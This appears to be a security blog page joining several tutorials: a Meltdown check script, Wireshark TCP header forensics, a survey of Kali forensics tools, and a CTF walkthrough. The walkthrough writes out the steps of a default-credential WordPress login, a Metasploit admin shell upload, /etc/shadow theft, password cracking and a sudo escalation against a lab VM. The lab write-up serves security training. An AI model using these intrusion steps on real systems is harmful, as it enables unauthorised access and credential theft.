Check Meltdown Vulnerability in Any CPU

Hello Friends!! You must have heard of the latest vulnerability “Meltdown”, which has been discovered in almost every CPU with an Intel processor; from this link you can check the list of vulnerable CPU descriptions. Today we are going to discuss how to “Check Meltdown vulnerability in any CPU” by using a script.

From Wikipedia
Meltdown is a hardware vulnerability affecting Intel x86 microprocessors and some ARM-based microprocessors. It allows a rogue process to read any physical, kernel or other process's mapped memory, regardless of whether or not it should be able to do so. It allows an unauthorized process to read data from any address that is mapped to the current process's memory space, because instruction pipelining in the affected processors means that the data from the unauthorized address will almost always be temporarily loaded into the CPU's cache during speculative execution, from which it can be recovered using other techniques, even if the original read instruction eventually fails due to privilege checking and never produces a readable result. Since many operating systems map physical memory, kernel processes, and other running user space processes into the address space of every process and rely on privilege checking to prevent unauthorized access, Meltdown effectively allows a rogue process to read any physical, kernel or other process's mapped memory, regardless of whether or not it should be able to do so. Accordingly, many servers and cloud services were impacted, as well as a potential majority of smart devices and embedded devices using ARM based processors (mobile devices, smart TVs and others), including a wide range of networking equipment.

Let’s start!!
Open the terminal and type the command given below to download the script from GitHub. The script can only dump linux_proc_banner, which works as an interface to internal data structures in the kernel and is used to get information about the system and to change certain kernel processes.



From the image given below you can observe that I have successfully downloaded this script on my Linux machine.


Now explore the downloaded folder in the terminal and run the command “make” to compile the program file before running the script.


Now run the script by executing the command given below, which will identify the vulnerability state by reading its memory space.
./run.sh
From the image given below you can observe that it has reported the system as vulnerable (ON) and has dumped the complete details of the CPU. So here it has shown details such as:
Vendor ID: The Vendor ID or VID is a unique number assigned to a piece of hardware to identify it on the system on which it has been installed.
CPU family: Processors with the same functionality are categorised into the same family; here CPU family 6 indicates a model from the Pentium Pro family.
Model: Indicates the model number within the CPU family.
Model name: Holds the model name of the processor.
Stepping: Used to identify the version of the microprocessor.
Microcode: The lowest-level instruction set, stored permanently to control the microprocessor.
CPU MHz: Describes the usage of the CPU.
Cache size: Defines the size of the cache memory.


You can also verify the above result by executing the command given below, which is used to obtain details of the system information.
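As an added check that is not part of the downloaded script or of this post: the code below parses the CPU fields discussed above out of /proc/cpuinfo text (a constructed sample is embedded so it runs anywhere) and, on Linux 4.15 or later, reads the kernel's own Meltdown verdict from the sysfs vulnerabilities file, which is a faster first check than running the dump script.

```python
"""Added example: summarise the dumped CPU fields and the kernel's Meltdown verdict."""

# Constructed sample of /proc/cpuinfo (illustrative values, first block only matters)
SAMPLE_CPUINFO = """\
processor\t: 0
vendor_id\t: GenuineIntel
cpu family\t: 6
model\t\t: 142
model name\t: Intel(R) Core(TM) i5-7200U CPU @ 2.50GHz
stepping\t: 9
microcode\t: 0x84
cpu MHz\t\t: 2700.000
cache size\t: 3072 KB

processor\t: 1
"""

# The fields the post walks through, in the order it lists them
FIELDS = ("vendor_id", "cpu family", "model", "model name",
          "stepping", "microcode", "cpu MHz", "cache size")

# Exposed by Linux 4.15+ (and distro backports); absent on older kernels
SYSFS_MELTDOWN = "/sys/devices/system/cpu/vulnerabilities/meltdown"

def parse_cpuinfo(text):
    """Return the listed fields for the first processor block only."""
    info = {}
    for line in text.splitlines():
        if not line.strip():
            break                      # a blank line ends the first block
        key, _, value = line.partition(":")
        key = key.strip()
        if key in FIELDS:
            info[key] = value.strip()
    return info

def classify_meltdown(status):
    """Map the kernel's status string to a short verdict."""
    status = status.strip()
    if status.startswith("Not affected"):
        return "not affected"
    if status.startswith("Mitigation:"):
        return "mitigated"             # e.g. "Mitigation: PTI"
    if status.startswith("Vulnerable"):
        return "vulnerable"
    return "unknown"

def meltdown_status(path=SYSFS_MELTDOWN):
    """Read the sysfs verdict; 'unknown' when the kernel does not expose it."""
    try:
        with open(path) as fh:
            return classify_meltdown(fh.read())
    except OSError:
        return "unknown"

if __name__ == "__main__":
    # On a Linux host read the live file; elsewhere fall back to the sample
    try:
        cpuinfo = open("/proc/cpuinfo").read()
    except OSError:
        cpuinfo = SAMPLE_CPUINFO
    for key, value in parse_cpuinfo(cpuinfo).items():
        print("%-12s: %s" % (key, value))
    print("meltdown    : %s" % meltdown_status())
```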

Network Packet Forensic using Wireshark

Today we are going to discuss “TCP Forensics” by covering some important topics, such as how data is transferred between two nodes, what the “OSI 7-layer model” is, and which layers' information Wireshark stores when it captures the traffic between two networks.
As we know, to transfer data from one system to another we need a network connection, which can be wired or wireless. But in reality the transmission of data does not depend only on the network connection; it involves several phases for transmitting data from one system to another, which are explained by the OSI model.

OSI stands for Open Systems Interconnection model, a conceptual model that defines and standardizes the process of communication between the sender’s and receiver’s systems. The data is transferred through a 7-layer architecture where each layer has a specific function in passing data on to the next layer.
Now have a look at the image given below, where we have explained the functionality of each layer in the OSI model. When data is transmitted by the sender’s network it travels downward, from the application layer to the physical layer, whereas when the receiver receives the transmitted data it travels upward, from the physical layer to the application layer.

Flow of Data from Sender’s network: Application > Presentation > Session > Transport > Network > Data Link > Physical

Flow of Data from Receiver’s network: Physical > Data Link > Network > Transport > Session > Presentation > Application


Examine Layers captured by Wireshark

Basically, when a user opens any application for sending or receiving data, he directly interacts with the application layer for both operations, sending and receiving. For example, we act as a client when we use the HTTP protocol for uploading or downloading a game, FTP for downloading a file, or SSH for accessing the shell of a remote system.
While connecting to an application for sharing data between server and client, we use Wireshark to capture the flow of the network traffic stream and examine the OSI model theory through the captured traffic.
From the image given below you can observe that Wireshark has captured the traffic of four layers in the direction from the source (sender) to the destination (receiver) network.
Here it has successfully captured Layer 2 > Layer 3 > Layer 4 and then Layer 7 information.


Ethernet Header (Data Link)

The data link layer holds the 6-byte MAC address of the sender’s system and the 6-byte MAC address of the receiver’s system, followed by a 2-byte EtherType that indicates which protocol is encapsulated, i.e. IPv4/IPv6 etc.

In Wireshark the Ethernet II layer represents the information transmitted over the data link layer. From the image given below you can observe that the highlighted lower part of Wireshark shows the information in hexadecimal format, where the first row holds the details of the Ethernet header.
So here you can get the source and destination MAC addresses, which are also available in the Ethernet header.
The row is divided into three columns as described below:



As we know, the MAC address of a system is always represented in hexadecimal format, but EtherTypes are generally categorised in the ways given below.


Once again, if you look at the image given below you can observe that the text highlighted in pink shows the hex value 08 00, which indicates that IPv4 is used here.

IP Header (Network Layer)
The IP header in Wireshark describes the network layer information, which is also known as the backbone of the OSI model as it holds the complete Internet Protocol version 4 details. The network layer divides data frames into packets and defines their routing path through hardware devices such as routers, bridges, and switches. These packets are identified through their logical addresses, i.e. the source and destination network IP addresses.
In the Wireshark image I have highlighted the six most important values, which contain vital information about a data packet; this information always flows in the same way, as it is encapsulated in the same pattern for every IP header.
Here 45 represents the IPv4 header length, 40 is the time to live (TTL) of the packet and 06 is the hex value for the TCP protocol; these values change whenever the TTL, IP version or protocol changes.

Therefore you can take the help of the table given below to examine the TTL value for different operating systems.


Similarly you can take the help of the table given below to examine the protocol value.


From the image given below you can observe the hexadecimal information of the IP header fields, and using the given table you can study these values to obtain their original meaning.




TCP Header (Transport layer)
Transmission Control Protocol (TCP), User Datagram Protocol (UDP) and Internet Control Message Protocol (ICMP) are the major protocols here, as they give host-to-host connectivity at the transport layer of the OSI model. It is also known as the heart of the OSI model as it plays a major role in transmitting error-free data.
By examining the network layer information through Wireshark we found that TCP is used here for establishing the connection with the destination network.
We know that when a computer communicates with another device like a modem, printer, or network server, it needs to handshake with it to establish a connection.

TCP follows the three-way handshake described below:

·         Client sends a TCP packet to the server with the SYN flag set.
·         Server responds to the client request with the SYN and ACK flags set.
·         Client completes the connection by sending a packet with the ACK flag set



Structure of TCP segment

Transmission Control Protocol accepts data from a data stream, splits it into chunks, and adds a TCP header creating a TCP segment. A TCP segment only carries the sequence number of the first byte in the segment.

A TCP segment consists of a segment header and a data section. The TCP header contains mandatory fields, and an optional extension field.

Source Port
The 16-bit source port number; identifies the sending port.
Destination Port
The 16-bit destination port number; identifies the receiving port.
Sequence Number
The sequence number of the first data byte in this segment. If the SYN control bit is set, the sequence number is the initial sequence number (n) and the first data byte is n+1.
Acknowledgment Number
If the ACK control bit is set, this field contains the value of the next sequence number that the receiver is expecting to receive.
Data Offset
The number of 32-bit words in the TCP header. It indicates where the data begins.
Reserved
Six bits reserved for future use; must be zero.
Flags
CWR, ECE, URG, ACK, PSH, RST, SYN, FIN
Window
Used in ACK segments. It specifies the number of data bytes, beginning with the one indicated in the acknowledgment number field that the receiver (the sender of this segment) is willing to accept.
Checksum
The 16-bit one's complement of the one's complement sum of all 16-bit words in a pseudo-header, the TCP header, and the TCP data. While computing the checksum, the checksum field itself is considered zero.
Urgent Pointer
Points to the first data octet following the urgent data.
Only significant when the URG control bit is set.
Options
Just as in the case of IP datagram options, options can be
either:
– A single byte containing the option number
– A variable length option in the following format
Padding
The TCP header padding is used to ensure that the TCP header ends and data begins on a 32 bit boundary.  The padding is composed of zeros.


Different Types of TCP flags

TCP flags are used within the TCP header; they are control bits that specify particular connection states or information about how a packet should be handled. The TCP flag field in a TCP segment helps us understand the function and purpose of any packet in the connection.



From the image given below you can observe the hexadecimal information of the TCP header fields, and using the given table you can study these values to obtain their original meaning.
Sequence and acknowledgement numbers are a major part of TCP, and they act as a way to guarantee that all data is transmitted consistently, since all data transferred through a TCP connection must be acknowledged by the receiver in a suitable way. When an acknowledgement is not received, the sender will resend all data that is unacknowledged.
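As an added example (not code from this article): the decoder below takes the raw bytes of a frame as Wireshark shows them in its hex pane and pulls out the fields discussed in the IP header and TCP header sections above (the 45/40/06 bytes, source and destination addresses, ports, sequence and acknowledgement numbers, and flags). The frame is constructed for the example and carries a valid IP header checksum, which the decoder verifies.

```python
"""Added example: decode Ethernet -> IPv4 -> TCP headers from raw frame bytes."""
import struct

# Constructed frame: Ethernet II + IPv4 + TCP SYN, 192.168.1.100:49152 -> 192.168.1.1:80
SAMPLE_FRAME = bytes.fromhex(
    "001122334455" "66778899aabb" "0800"    # dst MAC, src MAC, EtherType 0x0800 (IPv4)
    "45000028" "00010000" "4006f719"        # "45" v4/IHL 5, len 40, id 1, TTL 0x40, proto 06, checksum
    "c0a80164" "c0a80101"                   # src 192.168.1.100, dst 192.168.1.1
    "c0000050" "00000001" "00000000"        # sport 49152, dport 80, seq 1, ack 0
    "5002faf0" "00000000"                   # offset 5, flags SYN, window 64240, checksum, urgent
)

ETHER_TYPES = {0x0800: "IPv4", 0x0806: "ARP", 0x86DD: "IPv6"}
IP_PROTOCOLS = {1: "ICMP", 6: "TCP", 17: "UDP"}
TCP_FLAG_BITS = ("FIN", "SYN", "RST", "PSH", "ACK", "URG", "ECE", "CWR")  # bit 0 first

def ip_checksum(header):
    """RFC 1071 one's complement sum; returns 0 when the header's checksum is valid."""
    words = struct.unpack("!%dH" % (len(header) // 2), header)   # IHL is a multiple of 4 bytes
    total = sum(words)
    while total >> 16:                                           # fold carries back in
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def decode_frame(frame):
    """Walk Layer 2 -> 3 -> 4 in the order Wireshark lists them."""
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])
    out = {"dst_mac": ":".join("%02x" % b for b in dst),
           "src_mac": ":".join("%02x" % b for b in src),
           "ethertype": ETHER_TYPES.get(ethertype, "0x%04x" % ethertype)}
    if ethertype != 0x0800:
        return out                                   # only IPv4 is decoded here
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                         # the "45": version 4, 5 words = 20 bytes
    out.update({"ip_version": ip[0] >> 4, "ip_header_len": ihl,
                "ttl": ip[8], "protocol": IP_PROTOCOLS.get(ip[9], ip[9]),
                "src_ip": ".".join(str(b) for b in ip[12:16]),
                "dst_ip": ".".join(str(b) for b in ip[16:20]),
                "ip_checksum_ok": ip_checksum(ip[:ihl]) == 0})
    if ip[9] != 6:
        return out                                   # TCP only beyond this point
    tcp = ip[ihl:]
    sport, dport, seq, ack, off_flags, window = struct.unpack("!HHIIHH", tcp[:16])
    out.update({"src_port": sport, "dst_port": dport, "seq": seq, "ack": ack,
                "tcp_header_len": (off_flags >> 12) * 4, "window": window,
                "flags": [n for i, n in enumerate(TCP_FLAG_BITS) if off_flags >> i & 1]})
    return out

if __name__ == "__main__":
    for key, value in decode_frame(SAMPLE_FRAME).items():
        print("%-16s %s" % (key, value))
```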



Using the table given below you can read the hex values of other port numbers and their protocol services. These services operate after receiving an acknowledgement from the destination network and are examined at the application layer of the OSI model.
In this way you can examine every layer in Wireshark for network packet forensics.


Forensics Tools in Kali

Kali Linux is often thought of as one of the most popular toolkits available to security professionals. It contains a robust package of programs that can be used for conducting a host of security-based operations. One of the many parts in its division of tools is the forensics tab; this tab holds a collection of tools made with the explicit purpose of performing digital forensics.
Forensics is becoming increasingly important in today’s digital age, where many crimes are committed using digital technology; having an understanding of forensics can greatly increase the chance of making certain that criminals don’t get away with a crime.
This article is aimed at giving you an overview of the forensics capabilities possessed by Kali Linux.
So, let’s start with the programs as they appear in the forensics menu:
Autopsy

A tool used by the military, law enforcement and other entities when it comes time to perform forensic operations. This package is probably one of the most robust ones available through open source; it combines the functionalities of many other smaller, more focused packages in one neat application with a web-browser-based UI.



It is used to investigate disk images. When you click on Autopsy, it starts the service and its user interface can be accessed in the web browser at http://localhost:9999/autopsy. It gives the user the full range of options required to create a new case file: case name, description, investigator's name, host name, host time zone, etc.
Its functionalities include timeline analysis, keyword search, web artifacts, hash filtering, data carving, multimedia and indicators of compromise. It accepts disk images in RAW or E01 format and generates reports in HTML, XLS or body file format depending on what is required for a particular case.
Its robustness is what makes it such a great tool; be it case management, analysis or reporting, this tool has you covered.


Binwalk  
This tool is used while dealing with binary images; it has the capability of finding embedded files and executable code by exploring the image file. It is a very powerful tool for those who know what they are doing; if used right, it can find sensitive information hidden in firmware images that can be used to uncover a hack or to find a loophole to exploit.
This tool is written in Python and uses the libmagic library, making it perfect for use with magic signatures created for the Unix file utility. To make things easier for investigators, it contains a magic signature file which holds the most commonly found signatures in firmware, making it easier to spot anomalies.


Bulk Extractor  
This is a very interesting tool: when an investigator is looking to extract a certain kind of data from a digital evidence file, this tool can carve out email addresses, URLs, payment card numbers, etc. The tool works on directories, files and disk images. The data can be partially corrupted or compressed; this tool will find its way into it.
The tool comes with features which help to identify patterns in data that is found repeatedly, such as URLs, email IDs and more, and presents them in a histogram format. It has a feature by which it creates a word list from the data found; this can assist in cracking the passwords of encrypted files.


Chkrootkit
This program is mostly used in a live boot setting. It is used to locally check the host for any installed rootkits. It comes in handy when trying to harden an endpoint or making sure that a hacker has not compromised a system.
It has the capability to check system binaries for rootkit modification, lastlog deletions, quick and dirty string replacements and utmp deletions. This is just a taste of what it can do; the package seems simple at first glance, but to a forensic investigator its capabilities are invaluable.


Foremost  
Deleted files which might help solve a data incident? No problem: Foremost is an easy-to-use open source package that can carve data out of formatted disks. The filename itself might not be recovered, but the data it holds can be carved out.
Foremost was written by US Air Force special agents. It can recover files by referencing a list of headers and footers even if the directory information is lost; this makes for fast and reliable recovery.


Galleta  
When following a trail of cookies, this tool will parse them into a format that can be exported into a spreadsheet program.
Understanding cookies can be a tough nut to crack, especially if the cookies might be evidence in a cybercrime that was committed; this program can lend a hand by giving you the capability to structure the data in a better form and run it through analysis software, most of which usually requires the data to be in some form of spreadsheet.


Hashdeep
This program is a must when dealing with hashes. Its defaults are focused on MD5 and SHA-256. Be it existing files that have moved within a set, new files placed in a set, missing files or matched files, Hashdeep can work with all these conditions and give reports that can be scrutinized; it is very helpful for performing audits.
One of its biggest strengths is performing recursive hash computations with multiple algorithms, which is integral when time is of the essence.


Volafox
This is a memory analysis tool written in Python, focused on memory forensics for Mac OS X. It works on the Intel x86 and IA-32e architectures. If you’re trying to find malware or any other malicious program that was or is residing in the system memory, this is the way to go.


Volatility  
Probably one of the most popular frameworks when it comes to memory forensics. This is a Python-based tool that lets investigators extract digital data from volatile memory (RAM) samples. It is compatible with the majority of the 64- and 32-bit variants of Windows and selected flavors of Linux distros, including Android. It accepts memory dumps in various forms, be it raw format, crash dumps, hibernation files or VM snapshots, and can give a keen insight into the runtime state of the machine; this can be done independently of the host's investigation.
Here’s something to consider: decrypted files and passwords are stored in RAM, and if they are available, investigating files that might be encrypted on the hard disk can be a lot easier and the overall time of the investigation can be considerably reduced.


We will be following up this particular article with an in-depth review of the tools we have mentioned, with test cases.
Have fun and stay ethical.
About The Author
Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

Hack the Basic Penetration VM (CTF challenge)


Today we are going to take on another CTF challenge known as Basic Penetration. The credit for making this VM goes to “Josiah Pierce”, and it is another boot2root challenge where we have to root the server to complete the challenge. You can download this VM here.
Security Level: Beginner
Penetrating Methodology:
1.      Scanning
·         Netdiscover
·         NMAP
2.      Enumeration
·         Web Directory search 
·         Credential harvesting
3.      Exploiting
·         Metasploit shell upload
·         LinEnum.sh
4.      Privilege Escalation
·         Exploit Sudo rights

Walkthrough:

1. Scanning:

Let’s start off by scanning the network and identifying the host IP address. We can identify our host IP as 192.168.1.100 by using Netdiscover.

netdiscover

Then we used Nmap for port enumeration. We find that ports 21 (ftp), 22 (ssh) and 80 are open on the target.
nmap -A 192.168.1.100


2. Enumeration:
As we can see port 80 is open, so we tried to open the IP address in our browser, but we didn’t find anything on the webpage.


So we used dirb for directory enumeration.
After brute forcing with dirb we found a directory named /secret



Now we tried to open it in our browser. We came to know that the website is a WordPress site.



We tried to open the admin page 192.168.1.100/secret/wp-admin, but it wouldn’t open and we got redirected to the URL which you can see in the screenshot.


Then we added vtcsec to the hosts file.




Now we were able to access the admin page.


3. Exploiting:
We tried some basic credential combinations used in WordPress and found that admin:admin worked for us.
Then we used Metasploit to upload an admin shell onto the target using the above credentials and waited for a meterpreter session.
use exploit/unix/webapp/wp_admin_shell_upload
set username admin
set password admin
set targeturi /secret/
set rhosts 192.168.1.100
run
We successfully got a meterpreter session.

We then uploaded the LinEnum.sh script to check if password hashes are stored in /etc/passwd and also to attempt to read restricted files, i.e. /etc/shadow.


Here we can see the /etc/shadow has read only permission.


After opening the /etc/shadow file we can see there is a user with the name marlinspike.


We downloaded this shadow file into our local system and used John the Ripper to crack the password.
We found that the password for the user marlinspike is marlinspike.

4.     Privilege Escalation:
Now we log in as marlinspike.
We checked the sudoers list and found that we have full access as root, so we used sudo to become the superuser.
Great! We have successfully completed our challenge, as we were able to access the target as the root user.
su marlinspike
sudo -l
sudo su
id

Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here